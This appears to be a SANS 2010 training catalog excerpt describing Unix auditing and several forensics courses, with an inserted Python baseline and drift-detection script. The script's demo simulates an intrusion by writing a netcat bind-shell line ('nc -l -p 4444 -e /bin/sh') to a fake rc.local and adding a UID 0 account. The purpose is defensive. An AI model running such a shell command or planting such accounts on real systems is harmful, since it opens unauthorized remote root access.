Students will gain a deeper understanding of the inner workings and fundamentals of the Unix operating system as applied to the major Unix environments in use in business today. Students will get to explore, assess, and audit Unix systems hands-on. Neither Unix nor scripting experience is required for this day.
Topics: Auditing to Create a Secure Configuration; Auditing to Maintain a Secure Configuration; Auditing to Determine What Went Wrong

"I can immediately implement and manage the included tools to see an instant return on investment." -DAVID LIPSHAW, THE WILLS GROUP, INC.
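"Auditing to Maintain a Secure Configuration" and "Auditing to Determine What Went Wrong" in 507.6 above both rest on the same mechanism: a recorded baseline of the configuration files, and a later comparison against it. The following is an added example, not course material or any SANS tool, that records a SHA-256 digest plus permission bits and owner for every regular file under the audited paths, saves that as JSON, and on the next run reports files added, removed, or changed, naming which attribute changed. A mode change with identical content is reported as a change on purpose: a world-readable shadow file has the right bytes and is still wrong. The sample /etc tree, its contents and the drift applied to it are constructed inside a temporary directory so the script runs anywhere; on a real host you would point take_baseline at /etc and the other directories your audit program names.

```python
"""Configuration baseline and drift detection for a Unix host.

Added example, not course material. The sample tree, file contents and the
drift scenario in demo() are constructed; real use points take_baseline() at
the directories your audit program covers and keeps the baseline off-box.
"""
import hashlib
import json
import os
import stat
import tempfile
from typing import Dict, List


def _fingerprint(path: str) -> dict:
    """Digest, permission bits and owner for one file."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid}


def take_baseline(roots: List[str]) -> Dict[str, dict]:
    """Walk each root and fingerprint every regular file (symlinks are skipped)."""
    baseline = {}
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                p = os.path.join(dirpath, name)
                if stat.S_ISREG(os.lstat(p).st_mode):
                    baseline[p] = _fingerprint(p)
    return baseline


def compare(old: Dict[str, dict], new: Dict[str, dict]) -> Dict[str, List]:
    """Classify drift between two baselines, naming the attribute(s) that changed."""
    report = {"added": [], "removed": [], "changed": []}
    for p in sorted(set(old) | set(new)):
        if p not in old:
            report["added"].append(p)
        elif p not in new:
            report["removed"].append(p)
        elif old[p] != new[p]:
            what = [k for k in ("sha256", "mode", "uid") if old[p][k] != new[p][k]]
            report["changed"].append((p, what))
    return report


def save(baseline: Dict[str, dict], path: str) -> None:
    with open(path, "w") as fh:
        json.dump(baseline, fh, indent=1, sort_keys=True)


def load(path: str) -> Dict[str, dict]:
    with open(path) as fh:
        return json.load(fh)


def demo() -> Dict[str, List]:
    """Constructed scenario: baseline a fake /etc, apply drift, diff. Paths are
    returned relative to the temp directory so the result is stable."""
    with tempfile.TemporaryDirectory() as tmp:
        etc = os.path.join(tmp, "etc")
        os.makedirs(etc)

        def write(name, data, mode=0o644):
            p = os.path.join(etc, name)
            with open(p, "w") as fh:
                fh.write(data)
            os.chmod(p, mode)
            return p

        passwd = write("passwd", "root:x:0:0::/root:/bin/sh\n")
        shadow = write("shadow", "root:*:0:0:99999:7:::\n", 0o600)
        write("hosts", "127.0.0.1 localhost\n")
        store = os.path.join(tmp, "baseline.json")
        save(take_baseline([etc]), store)

        # Drift: a UID 0 account appended, shadow made world-readable,
        # hosts deleted, and a new executable startup script.
        with open(passwd, "a") as fh:
            fh.write("eve:x:0:0::/tmp:/bin/sh\n")
        os.chmod(shadow, 0o644)
        os.remove(os.path.join(etc, "hosts"))
        write("rc.local", "nc -l -p 4444 -e /bin/sh\n", 0o755)

        report = compare(load(store), take_baseline([etc]))
        rel = lambda p: os.path.relpath(p, tmp)
        return {
            "added": [rel(p) for p in report["added"]],
            "removed": [rel(p) for p in report["removed"]],
            "changed": [(rel(p), w) for p, w in report["changed"]],
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Keep the baseline file somewhere the audited host cannot write, or an intruder with root simply regenerates it after making changes; the same applies to the script itself.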
FOR408: Computer Forensic Essentials
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: Rob Lee

Master computer forensics. Learn essential investigation techniques.

With today's ever-changing technologies and environments, it is inevitable that organizations will deal with some form of cyber crime, such as computer fraud, insider threat, industrial espionage, or phishing. As a result, many organizations are hiring digital forensic professionals and are calling cybercrime law enforcement agents to help fight and solve these types of crime.

FOR408: Computer Forensic Essentials focuses on the essentials that a forensic investigator must know to investigate core computer crime incidents successfully. You will learn how computer forensic analysts focus on collecting and analyzing data from computer systems to track user-based activity that could be used internally or in civil/criminal litigation.

This course covers the fundamental steps of the in-depth computer forensic methodology so that each student will have the complete qualifications to work as a computer forensic investigator in the field helping solve and fight crime. This is the first course in the SANS Computer Forensic Curriculum. If this is your first computer forensics course with SANS, we recommend that you take this introductory course first to set a strong foundation for the full SANS Computer Forensic Curriculum.

Who Should Attend
• Information technology professionals who wish to learn core concepts in computer forensics investigations and e-discovery
• Law enforcement officers, federal agents, or detectives who desire to be introduced to core forensic techniques and topics
• Information security managers who need a digital forensics background in order to manage investigative teams and understand the implications of potential litigation-related issues
• Information technology lawyers and paralegals who need to understand the basics of digital forensic investigations
• Anyone interested in computer forensic investigations with some background in information systems, information security, and computers

AUTHOR STATEMENT
SANS COMPUTER FORENSICS GRADUATE THWARTS BANK HEIST. Headlines similar to these are now a reality as former students have e-mailed me regularly about how they were able to use their digital forensic skills in very real situations. Graduates of Computer Forensics Essentials are the front line troops deployed when incidents occur. From stopping online bank heists to logic bombers trying to destroy data that could affect many lives, SANS digital forensic graduates are battling and winning the war on crime. Graduates have described solved cases involving computer break-ins, intellectual property theft, fraud, and, in some cases, internal infractions by belligerent employees. Knowing that this course places the correct methodology and knowledge in the hands of responders who thwart the plans of criminals or foreign cyber attacks brings me great comfort. Graduates are doing it. Daily. I am proud that the Computer Forensics Essentials course at SANS helped prepare them to fight and solve crime. - Rob Lee

FIGHT CRIME. UNRAVEL INCIDENTS... ONE BYTE AT A TIME.

With this course, you will receive a FREE SANS Investigative Forensic Toolkit (SIFT) Essentials with a Tableau Write Block Acquisition Kit. The entire kit will enable each investigator to accomplish proper and secure examinations of SATA, IDE, or Solid State Drives (SSD). The toolkit consists of:
• Free SANS Investigative Forensic Toolkit (SIFT)
  - One Tableau T35es eSATA Forensic Bridge
  - IDE Cable/Adapters
  - SATA Cable/Adapters
  - FireWire and USB Cable Adapters
  - Forensic Notebook Adapters (IDE/SATA)
  - HELIX Incident Response and Computer Forensics Live CD
• SANS Windows XP Forensic Analysis VMware Workstation
• Course DVD: Loaded with case examples, tools, and documentation
26 SANS Network Security 2010
September 19 - 29, 2010
SANS Computer Forensic Web site http://computer-forensics.sans.org
The learning does not end when class is over. The SANS Computer Forensic Web site is a community-focused site offering digital forensics professionals a one-stop forensic resource to learn, discuss, and share current developments in the field. It also provides information regarding SANS forensics training, GIAC certification, and upcoming events. Visit http://computer-forensics.sans.org. New content is added regularly, so please visit often. In addition, do not forget to share this information with your fellow forensic professionals.

408.1 Hands On: Forensic and E-Discovery Fundamentals*
Investigations begin with a firm knowledge in proper evidence acquisition and analysis. Digital Forensics is more than just using a tool that automatically recovers data. You must focus on the facts to seek the truth. Digital Forensics requires analytical skills. Today you will learn how the professionals accomplish digital forensics.
Topics: Purpose of Forensics; Discussion of Major Case Types; Types of Electronically Stored Information; Location of Electronically Stored Evidence (ESI); Evidence Collection Order of Volatility; Hard Drive Basics; File System Basics; Evidence Fundamentals; Reporting and Presenting Evidence; Forensic Methodology

408.2 Hands On: Evidence Acquisition and Analysis*
You will learn proper evidence acquisition, integrity, and handling skills of logical, physical, and system memory utilizing the Tableau T35es write blocker. Moving quickly from evidence acquisition, you will begin your investigation using cutting-edge tools that the pros use.
Topics: Evidence Acquisition Basics; Preservation of Evidence; Types of Acquisition; Forensic Field Kits; Full Disk Image Acquisition Tools and Techniques; Network Acquisition; Graphical Forensic Tools; Traditional Tasks Utilized Using the Forensic Tools; Recover Deleted Files

408.3 Hands On: E-Mail and Registry Analysis*
Beginning with host, server, and webmail forensics, the investigator will learn how to recover and analyze the most popular form of communication. The second focus centers on Windows XP, Vista, and Windows 7 Registry Analysis and USB Device Forensics.
Topics: E-mail Forensics; Registry Forensics In-Depth

408.4 Hands On: Artifact and Log File Analysis*
Hundreds of files are created by actions of the suspect. Learn how to examine key files such as link files, the Windows prefetch, pagefile/system memory, and more. The latter part of the day will center on examining the Windows log files and their usefulness in both simple and complex cases.
Topics: Memory, Pagefile, and Unallocated Space Analysis; Forensicating Files Containing Critical Digital Forensic Evidence; Windows Event Log Digital Forensic Analysis

408.5 Hands On: Web Browser Forensics*
Internet Explorer and Firefox Browser Digital Forensics. Learn how to examine exactly what an individual did while surfing via their Web browser. The results will give you pause the next time you use the Web.
Topics: Browser Forensics

408.6 Hands On: Forensic Challenge and Mock Trial*
Windows Vista/7 Based Digital Forensic Challenge. There has been a murder-suicide and you are the investigator assigned to process the hard drive. This day is a capstone for every artifact discussed in the class. You will use this day to solidify the skills that you have learned over the past week.
Topics: Digital Forensic Case; Mock Trial

*This course is available to Forensics 408 participants only.

SANS Faculty Fellow
Rob Lee
Rob Lee is a director for MANDIANT (www.mandiant.com). Rob is the curriculum lead for digital forensic training at the SANS Institute (forensics.sans.org). He has over 14 years of experience in computer forensics, vulnerability and exploit discovery, intrusion detection/prevention, and incident response. Rob graduated from the U.S. Air Force Academy and served in the Air Force as a founding member of the 609th Information Warfare Squadron, the first U.S. military unit focused on information operations. Later, as a member of the Air Force Office of Special Investigations, he conducted computer crime investigations, incident response, and computer forensics. Prior to joining MANDIANT, he worked with a variety of government agencies in the law enforcement, U.S. Department of Defense, and intelligence communities as the technical lead for a vulnerability discovery and exploit development team, lead for a cyber forensics branch, and lead for a computer forensic and security software development team. Rob coauthored Know Your Enemy, 2nd Edition. He earned his MBA from Georgetown University in Washington DC. Rob was awarded the Digital Forensic Examiner of the Year from the Forensic 4Cast 2009 Awards. He blogs about computer forensic and incident response topics at the SANS Computer Forensic Blog. http://blogs.sans.org/computer-forensic

Register at www.sans.org/network-security-2010
FORENSICS

508
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructors: Mike Murr; Richard Salgado (Day 5)

Who Should Attend
• Incident response team members that respond to complex security incidents/intrusions and need computer forensics to help solve their cases
• Computer forensic professionals who want to solidify and expand their understanding of file system forensics and incident response related topics
• Law enforcement officers, federal agents, or detectives who want to master computer forensics and expand their investigative skill set to include data breach investigations and intrusion cases
• Information security professionals with some background in hacker exploits, penetration testing, and incident response
• Information security managers who would like to master digital forensics to understand information security implications and potential litigation or manage investigative teams

Data breaches and advanced intrusions are occurring daily.
Sensitive data and intellectual property is stolen from systems that are protected by sophisticated network and host-based security. A motivated criminal group or nation state can and will always find a way inside enterprise networks. In the commercial and government sectors, hundreds of victims responded to serious intrusions costing millions of dollars and loss of untold terabytes of data. Cyber attacks originating from China dubbed the Advanced Persistent Threat have proved difficult to suppress. FOR508 will help you respond to and investigate these incidents.
This course will give you a firm understanding of advanced incident response and computer forensics tools and techniques to investigate data breach intrusions, tech-savvy rogue employees, advanced persistent threats, and complex digital forensic cases.
Utilizing advances in spear phishing, Web application attacks, and persistent malware, these new sophisticated attackers advance rapidly through your network. Incident responders and digital forensic investigators must master a variety of operating systems, investigation techniques, incident response tactics, and even legal issues in order to solve challenging intrusion cases. FOR508 will teach you critical forensic analysis techniques and tools in a hands-on setting for both Windows- and Linux-based investigations.
Attackers will use anti-forensic techniques to hide their tracks. They use rootkits, file wiping, timestamp adjustments, privacy cleaners, and complex malware to hide in plain sight, avoiding detection by standard host-based security measures. Everything will leave a trace; you merely need to know where to look.
Learning more than just how to use a forensic tool, by taking this course you will be able to demonstrate how the tool functions at a low level. You will become skilled with new tools, such as the Sleuthkit, Foremost, and the HELIX3 Pro Forensics Live CD. SANS’ hands-on technical course arms you with a deep understanding of the forensic methodology, tools, and techniques to solve advanced computer forensics cases.

FIGHT CRIME. UNRAVEL INCIDENTS... ONE BYTE AT A TIME.

Prerequisites: It is highly recommended that each student attend FOR408 prior to taking this course or have equivalent digital forensic experience in the field.

GIAC Certification www.giac.org
Cyber Guardian Program www.sans.org/cyber-guardian

Computer Forensic Investigations and Incident Response is one of SANS’ most advanced and challenging courses. People with GCIA and GCFA certifications often land some of the most challenging jobs in information security. They have solved crimes that have appeared on the evening news.

AUTHOR STATEMENT
“There are people smarter than you, they have more resources than you, and they are coming for you. Good luck with that.” Matt Olney said when describing the Advanced Persistent Threat. He was not joking. The results over the past several years clearly indicate that hackers employed by nation states and organized crime are racking up success after success. The Advanced Persistent Threat has compromised hundreds of organizations. Organized crime utilizing botnets is exploiting ACH fraud daily. Similar groups are penetrating banks and merchants stealing credit card data daily. Fortune 500 companies are beginning to detail data breaches and hacks in their annual stockholders’ reports. The enemy is getting better, bolder, and their success rate is impressive. We can stop them. We need to field more sophisticated incident responders and digital forensic investigators. We need lethal digital forensic experts that can detect and eradicate advanced threats immediately. A properly trained incident responder could be the only defense your organization has left in place during a compromise. FOR508 is crucial training for you to become a lethal forensicator to step up to these advanced threats. The enemy is good. We are better. This course will help you become one of the best. - Rob Lee

508.1 Hands On: Forensic and Investigative Essentials*
Beginning the first day, you will learn the proper methodology of investigating complex and advanced digital crimes and intrusions. Utilizing real-world intrusion scenarios, you will see how to respond to complex attacks by learning the background of how data is stored on a variety of operating systems. This knowledge will allow you to see beyond most anti-forensic techniques, allowing you to gain the advantage while responding to breaches in your organization.
Topics: Computer Forensics for Incident Responders; Incident Response and Forensics; File System Essentials; Linux/Unix File System Fundamentals; Windows FAT and exFAT File System Fundamentals; Windows NTFS File System Fundamentals

508.2 Hands On: Live Response and Complex Evidence Acquisition*
Computer Forensic Investigators should be conversant with network and file system forensics in addition to being armed with the latest in incident response tools and methodologies. On day two, you will learn how to respond to complex situations to collect crucial evidence using: Memory Acquisition, Live Response Techniques, and Complex Evidence Acquisition.
Topics: Key Forensic Acquisition/Analysis Concepts; Volatile Evidence Gathering and Analysis; Unix and Windows Live Response; Windows Incident Response Methodology; Evidence Integrity; Complex Forensic Evidence Acquisition and Imaging

508.3 Hands On – Part 1: File System Forensic Analysis*
Investigating intrusion cases is challenging even for the seasoned investigator. Hackers will try to evade detection and utilize wiping and other anti-forensic techniques to avoid leaving a trail on the host and network. In order to investigate intrusion cases, you have to have a firm grasp of low-level forensic capabilities in both commercial and open-source tools. Understanding the various layers of the file system will allow you to move beyond being an average investigator into one that could recover data “by hand” if necessary. To accomplish this, we cover the Sleuthkit in the course.
Topics: Filesystem Timeline Analysis; File System and Data Layer Examination; Metadata Layer Examination; File Name Layer Examination; File Sorting and Hash Comparisons; Automated GUI Based Forensic Toolkits

508.4 Hands On – Part 2: File System Forensic Analysis*
Utilizing advances in spear phishing, web application attacks, and persistent malware, these new sophisticated attackers advance rapidly through your network. Forensic investigators must master a variety of operating systems, investigation techniques, and incident response tactics to solve challenging cases. Recovering data that was skillfully removed can still be accomplished once an investigator knows the right places to look. This day of the course introduces the investigator to some of the most cutting-edge areas of computer forensics discovered over the past year. Shadow Volume/Restore Point Examinations, Super Timeline Analysis, and Advanced Registry Examinations are all covered during the day.
Topics: Key Windows File System Analysis Concepts; Intermediate/Advanced Windows Registry Analysis; Windows XP Restore Point Analysis; Vista, Windows 7, Server 2008 Shadow Volume Copy Analysis; Super Timeline Analysis; Recovery of Key Windows Files; Finding Unknown Malware; Step-By-Step Methodology to Analyze and Solve Challenging Cases

508.5 Hands On: Computer Investigative Law for Forensic Analysts*
Legal issues, especially liability, remain foremost in the minds of an incident handler or forensic investigator; therefore, this class has more discussion than any other we offer. Learn to investigate incidents while minimizing the risk for legal trouble. This course is designed not for management, but for the individuals actually performing a computer-based investigation. The content focuses on challenges that every investigator needs to understand before, during, and post investigation. Since most investigations could potentially bring a case to either a criminal or civil courtroom, it is essential for you to understand how to perform a computer-based investigation legally and ethically.
Topics: Who Can Investigate and Investigative Process Laws; Evidence Acquisition/Analysis/Preservation Laws and Guidelines; U.S. Laws Investigators Should Know; E.U. Laws Investigators Should Know; Presenting Data; Forensic Reports and Testimony

508.6 Hands On: Advanced Forensics & the Forensic Challenge*
Learn how to discover new artifacts using application forensics. Put your new skills to the test during the end-of-week capstone investigation called the Forensic Challenge.
Topics: Application Footprinting and Software Forensics; The Forensic Challenge

Free SANS Investigative Forensic Toolkit (SIFT)
See page 26 for contents.

*This course is available to Forensics 508 participants only.

Certified Instructor
Mike Murr
Michael has been a forensic analyst with Code-X Technologies for over five years, has conducted numerous investigations and computer forensic examinations, and has performed specialized research and development. Michael has taught SANS Security 504 (Hacker Techniques, Exploits, and Incident Handling), SANS Security 508 (Computer Forensics, Investigation, and Response), and SANS Security 601 (Reverse-Engineering Malware); has led SANS@Home courses; and is a member of the GIAC Advisory Board. Currently, Michael is working on an open-source framework for developing digital forensics applications. Michael holds the GCIH, GCFA, and GREM certifications and has a degree in computer science from California State University at Channel Islands. Michael also blogs about digital forensics on his Forensic Computing blog. www.forensicblog.org
FORENSICS

558 Network Forensics
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 5:00pm
30 CPE Credits • Instructor: Jonathan Ham
Laptop not required – each student will receive a FREE 10” mini laptop loaded with Network Forensics tools that you can take home.

Who Should Attend
• Network and/or computer forensic examiners
• Computer incident response team members
• Security architects
• Security administrators
• Law enforcement
• Anyone responsible for orchestrating a corporate or government network for evidence acquisition in the face of a criminal or civil investigation

Want to analyze DNS tunnel traffic? Carve cached Web pages out of central Squid proxies? Extract JPGs and GIFs from Snort packet captures for forensic investigations?
Network equipment, such as Web proxies, firewalls, IDS, routers, and even switches, contain evidence that can make or break a case. In FOR558 you’ll learn how to recover evidence from network-based devices and use it to build your case.
The first day we dive right into DNS tunnel analysis, DHCP log examination, and sniffing traffic. By day two, you’ll be extracting tunneled flow data from DNS NULL records and extracting evidence from firewall logs. On day three, we analyze Snort captures and the Web proxy cache. You’ll carve out cached Web pages and images from the Squid Web proxy. For the last two days, you’ll be part of a live hands-on investigation. Working in teams, you’ll use network forensics to solve a crime and present your case.
During hands-on exercises, we will use tools, such as tcpdump, Snort, ngrep, tcpxtract, and Wireshark, to understand attacks and trace suspect activity. Each student will be given a virtual network to analyze and will have the opportunity to conduct forensic analysis on a variety of devices. Underlying all of our forensic procedures is a solid forensic methodology. This course complements FOR408: Computer Forensic Essentials, using the same fundamental methodology to recover and analyze evidence from network-based devices.
A hard drive is just a small part of the picture. Even if an attacker is smart enough to clean up tracks on the victim system, remnants remain in firewall logs, Web proxy caches, and other sources. FOR558: Network Forensics teaches students how to follow the attacker’s footprints and analyze evidence throughout the network environment.
As a part of this course you will receive a SANS Network Investigative Forensics Toolkit (SNIFT). With your SNIFT Kit, you will gain first-hand experience in collecting and analyzing evidence recovered from a network under investigation—and you can take it home with you!

The SNIFT Kit consists of:
• Lenovo IdeaPad S10 – 10” Mini Laptop!
• SANS VMware-based Forensic Analysis Network, complete with:
- Squid Web Proxy
- Firewall
- Snort IDS
- Web Servers
- DNS server
- DHCP server
- … and more!
• SANS Network Forensic Workstation, installed with:
- Packet Tools (tcpdump, Wireshark, ngrep, tcpxtract and others)
- Log Analysis Tools (Splunk, squidview, and more)
- Custom-written tools from the Network Forensics community (pcapcat, oftcat, & more)
• Course Netbook loaded with case examples!

PREREQUISITE: Students should have some familiarity with basic networking fundamentals, such as the OSI model and basics of TCP/IP. Please ensure that you can pass the SANS TCP/IP & Hex Knowledge quiz. Students should also have basic familiarity with Linux or willingness to learn in a Linux-based environment.

AUTHOR STATEMENT
Computer forensics has traditionally focused on file recovery and filesystem analysis performed against system internals or seized storage devices. However, the hard drive is only half the story. These days evidence almost always traverses the network and sometimes is never stored on a hard drive at all. Network forensics can reveal who communicated with whom, when, how, and how often. It can uncover the low-level addresses of the systems communicating, which investigators can use to trace an action or conversation back to a physical device. The entire contents of e-mails, IM conversations, Web surfing activities, and file transfers can be recovered and reconstructed to reveal the original transaction. More importantly, the protocol data that surrounded each conversation is often extremely valuable to the investigator, and this data can only be acquired from network-based devices. The payload inside the packet at the highest layer may end up on disk, but the envelope that got it there is only captured in the network traffic. Network forensics can reveal evidence that is crucial to building a case. -Jonathan Ham

“This course is amazing. Not only are we covering an extensive range of topics, we are doing lab work for each topic so that we can be comfortable with the new material. Love the class!”
-DEBORAH GOSHORN, NAVAL POSTGRADUATE SCHOOL

558.1 Hands On: Passive Evidence Acquisition and Analysis*
On the first morning, we’ll investigate a rogue system administrator. His colleagues suspect he may be abusing his privileges. There doesn’t seem to be any Web surfing activity at all associated with his computers. What could he be up to? To solve the case, we embark together on an extensive analysis of DHCP logs, wireless traffic captures, tcpdump using BPF filters, Wireshark, and the DNS protocol. Along the way, we’ll learn about DNS tunneling using iodine, methods of passive evidence acquisition, network taps, hubs, switches, and port mirroring. We’ll also use tools, such as ngrep, tcpxtract, and hex editors, to extract the data we need. Underlying all of our forensic procedures is a solid forensic methodology, which includes verification, acquisition, timeline creation, evidence recovery, and reconstruction.
Topics: Case Study: Data Tunneling; The OSI Model for Network Analysis; DHCP & MAC Address Analysis; Passive Evidence Acquisition; Network Evidence Extraction & Analysis

558.2 Hands On: Active Evidence Acquisition and Covert Tunnels*
We’ll begin with covert ICMP and DNS tunnels. You’ll extract tunneled TCP and IP packets from DNS NULL records and use active evidence collection methods to uncover the rogue system administrator’s secret plot! By the afternoon we’ll conduct hands-on active evidence acquisition. You’ll inspect router ARP tables and firewall logs. Volatility and collection methods vary depending on configuration, manufacturer, and the environment. We’ll also cover ways that investigators can compensate for less-than-ideal network environments, using publicly available forensic evidence acquisition tools.
Topics: Data Tunneling In-Depth; A Formal Network-Based Investigative Methodology; Active and Interactive Evidence Acquisition

558.3 Hands On: Firewalls, IDS, Proxies, and Data Reconstruction*
Active evidence acquisition is the focus of day three. We’ll analyze IDS/IPS, central logging servers, and Web proxies such as Squid, during hands-on exercises throughout the day. By the end of day three, students will be using hex editors to carve cached evidence out of Web proxies and reconstruct Web surfing histories using only the central Web proxy logs.
Topics: Network Log Analysis In-Depth; Network Intrusion Detection & Analysis with Snort; Web Proxies, Encryption, & SSL Interception

558.4 Hands On: Network Forensics Unplugged*
At the beginning of the day, we will discuss wireless access point investigations and then learn about techniques for presenting digital evidence in court. After lunch we will begin our Capstone Case Study in which students will work as investigative teams, presented with a realistic scenario and a virtual network. You will identify sources of evidence, collect the evidence, reconstruct content, solve the crime, and present your analysis in “court.”
Topics: Wireless Access Point Investigations; Digital Evidence Court Primer; Capstone Case Study: Investigate a Crime and Present the Evidence

558.5 Hands On: Capstone Investigation*
Working in investigative teams, students will use forensic analysis tools to build a coherent picture of the crime. We will investigate by carving files out of raw network traffic and extracting sensitive data hidden in ICMP payloads. We will trace the attack to its source by correlating activity with firewall logs, central server logs, IDS logs, and other network-based evidence. Finally, we will identify one of our suspects by reconstructing cached Web content, analyzing DHCP logs, and implementing passive OS fingerprinting techniques. After using this evidence to build a solid case, we will develop a cohesive picture of the crime and discuss techniques for presenting supporting evidence in deposition.
Topics: Capstone Case Study: Investigate a Crime and Present the Evidence, cont.; Trace the Attack to its Source by Correlating: Firewall Logs, Central OS Logs, IDS Logs, and more; Reconstruct Web Histories and Cached Web Content; Analyze DHCP Logs; Fingerprint a Suspect’s Computer; Identify the Suspect using Network-based Evidence; Build a Case and Discuss Techniques for Presenting in Court

*This course is available to Forensics 558 participants only.

Certified Instructor
Jonathan Ham
Jonathan is an independent consultant who specializes in large-scale enterprise security issues, from policy and procedure, through staffing and training, to scalable prevention, detection, and response technology and techniques. With a keen understanding of ROI and TCO (and an emphasis on process over products), he has helped his clients achieve greater success for over 12 years, advising in both the public and private sectors, from small upstarts to the Fortune 500. He’s been commissioned to teach NCIS investigators how to use Snort, performed packet analysis from a facility more than 2,000 feet underground, and chartered and trained the CIRT for one of the largest U.S. civilian federal agencies. He currently holds the CISSP, GSEC, GCIA, and GCIH certifications and is a member of the GIAC Advisory Board. A former combat medic, Jonathan still spends some of his time practicing a different kind of emergency response, volunteering and teaching for both the National Ski Patrol and the American Red Cross.
FORENSICS

563
Five-Day Program • Mon, Sept 20 - Fri, Sept 24, 2010 • 9:00am - 5:00pm
30 CPE Credits • Laptop Required • Instructor: SANS Staff

Who Should Attend
• Information security professionals responsible for investigating misuse of mobile devices by employees and for responding to attacks against and theft of mobile devices
• Forensic investigators who want to process mobile devices in a forensically sound manner and use the resulting evidence in their work
• IT managers who need to understand the relevance of mobile devices in security breaches, policy violations, criminal activities, civil suits, and any resulting proceedings
• IT auditors who need tools and techniques for investigating mobile devices to ensure they are not being misused in a way that puts an organization at risk
• Law enforcement agents who need to extract information from mobile devices in a wide variety of crimes
• Attorneys who need an understanding of the types of evidence that can be extracted from mobile devices, the forensic process, legal issues (e.g., privacy, authentication, integrity), and how the findings can be used to build/strengthen a case

Mobile device forensics is a rapidly evolving field, creating exciting opportunities for practitioners in corporate, criminal, and military settings.
Written for students who are both new to and already familiar with mobile device forensics, this hands-on course provides the core knowledge and skills that a digital forensic investigator needs to process cell phones, PDAs, and other mobile devices. Using state-of-the-art tools, you will learn how to forensically preserve, acquire, and examine data stored on mobile devices and utilize the results for internal investigations or in civil/criminal litigation.
With the increasing prevalence of mobile devices, digital forensic investigators are encountering them in a wide variety of cases. Investigators within organizations can find stolen data and incriminating communications on devices used by rogue employees. In civil and criminal cases, investigators can extract useful evidence from mobile devices, can get a clearer sense of which individuals were in cahoots, and can even show the location of key suspects at times of interest. IT auditors, managers, and lawyers all need to understand the vast potential of mobile device forensics.
By guiding you through progressively more intensive exercises with mobile devices, we familiarize you with the inner workings of these devices and show you the benefits and limitations of various approaches and tools. The combination of teaching skills and knowledge will enable you to resolve investigations. The capstone exercise at the end of this course is designed to hone your mobile device forensics skills and help you apply them to an actual investigation.
Laptops are required for this course. A variety of devices will be available for you to work with during the course. You are also encouraged to bring used mobile devices and SIM cards from home to experiment with using the tools and techniques in this course, but this is not required.

AUTHOR STATEMENT
Mobile devices are becoming ubiquitous, delivering powerful technology into our pockets, keeping us connected wherever we are, and creating new security risks while providing valuable sources of evidence. Individuals store personal data on their PDAs, parents use GPS enabled devices to track their children, hospitals use handhelds to access medical data and support patient care, and companies give each employee a Blackberry to support their business. Corporate spies and data thieves have been caught using their mobile devices. Organized criminal groups have been infiltrated and unraveled through their use of mobile devices. A killer’s mobile device showed his whereabouts at the time of the crime and inadvertently recorded the sounds of his brutal acts. Sex offenders have videotaped their crimes using mobile devices. Many vice officers and courts consider mobile devices an integral part of drug trafficking and dealing. Using the proper methodology and tools, you can extract useful evidence from mobile devices and obtain records from network service providers to help avert an attack, further an investigation, or solve a crime. -Eoghan Casey

“This course was an informative, hands-on, and concise class that changed the way I look at security tools.”
-RICHARD SALMON, LOUISIANA STATE EMPLOYEE RETIREMENT SYSTEM

563.1 Hands On: Fundamentals of Mobile Device Forensics*


This first day covers a review of technology from a forensic perspective, forensic handling of mobile devices, and manual
examination of mobile devices. In delving into the underlying technology of mobile devices and wireless networks, we show you
how the data they contain can be used as evidence. We will cover the core forensic methodology as it relates to mobile devices
when conducting a manual triage inspection, logical forensic examination, and in-depth forensic analysis of physical memory. We
show you how to interpret and utilize various identifiers and numbers associated with mobile devices, including MEID, IMEI, ICC-ID, and IMSI. Hands-on exercises include how to process mobile devices from a forensic perspective and obtain information that
forensic tools may not provide.
Topics: Mobile Network Investigations; Mobile Device Forensics; Forensic Handling of Mobile Devices; Forensic Documentation; Interacting with Mobile Devices; Hands-on Exercises

563.2 Hands On: Windows Mobile Forensics*


On this day we’ll go through a hands-on exploration of mobile device operating systems and data storage using manufacturer and
developer utilities. We will perform forensic acquisitions and examinations of SIM cards to better understand how they store data,
how to decode the data, the types of information they contain, and how that information can be useful in an investigation. You will
use manufacturer and developer tools to gain a deeper understanding of mobile device internals.
Topics: Accessing Mobile Devices; Mobile Device Operating Systems; Mobile Device File Systems; Forensic Processing of SIM Cards; Forensic Examination of Data; Hands-on Exercises

563.3 Hands On: Cell Phone Forensics*


We will use forensic tools to acquire and analyze logical data from mobile devices and then compare forensic acquisition tools
and validate completeness and accuracy of results. No one tool can accomplish everything, and you need to be able to select the
right tool for the job at hand. As day three progresses, we dig deeper into digital evidence on mobile devices, analyzing call logs,
SMS/MMS, photos, and associated metadata. In addition, we demonstrate how to utilize e-mail, Web browsing, and other Internet
activities on mobile devices in an investigation.
Topics: Forensic Acquisition Tools for Mobile Devices; Forensic Examination of Logical Data; Forensic Analysis of Internet Activities on Mobile Devices; Forensic Reconstruction of Activities on Mobile Devices; Hands-on Exercises

563.4 Hands On: Blackberry, Nokia, and iPhone*


Acquiring full memory contents is one of the more challenging aspects of mobile device forensics and may not be feasible in all
cases. We’ll use forensic tools to acquire and analyze physical memory from mobile devices and then delve into memory contents
and extract data structures on mobile devices. You’ll learn how to confirm key findings by examining them in their original context
in hexadecimal form. We demonstrate the various mechanisms for acquiring memory, including Flasher boxes, and assess their
strengths and limitations from a forensic perspective. We will step you through the process of acquiring the full contents of physical
memory from a mobile device.
Topics: Forensic Acquisition of Physical Memory; Forensic Acquisition Using Flasher Boxes; Forensic Examination of Physical Memory; Hands-on Exercises

563.5 Hands On: Advanced Forensics and the Forensic Challenge*


This last day familiarizes you with more complicated and costly forensic acquisition and analysis techniques. For instance, using specialized equipment for accessing circuit boards of mobile devices, it is possible to access data in memory directly. A realistic hands-on investigative scenario brings together lessons and techniques learned throughout the course. Even the most ingenious technical analysis becomes worthless, however, if it is not clearly presented to decision makers -- a manager, lawyer, or jury. We spend the final part of the course discussing effective approaches for presenting your findings to a non-technical audience.
Topics: Advanced Mobile Device Forensics Overview; Bringing It All Together; The Mobile Device Forensic Challenge; Hands-on Exercise
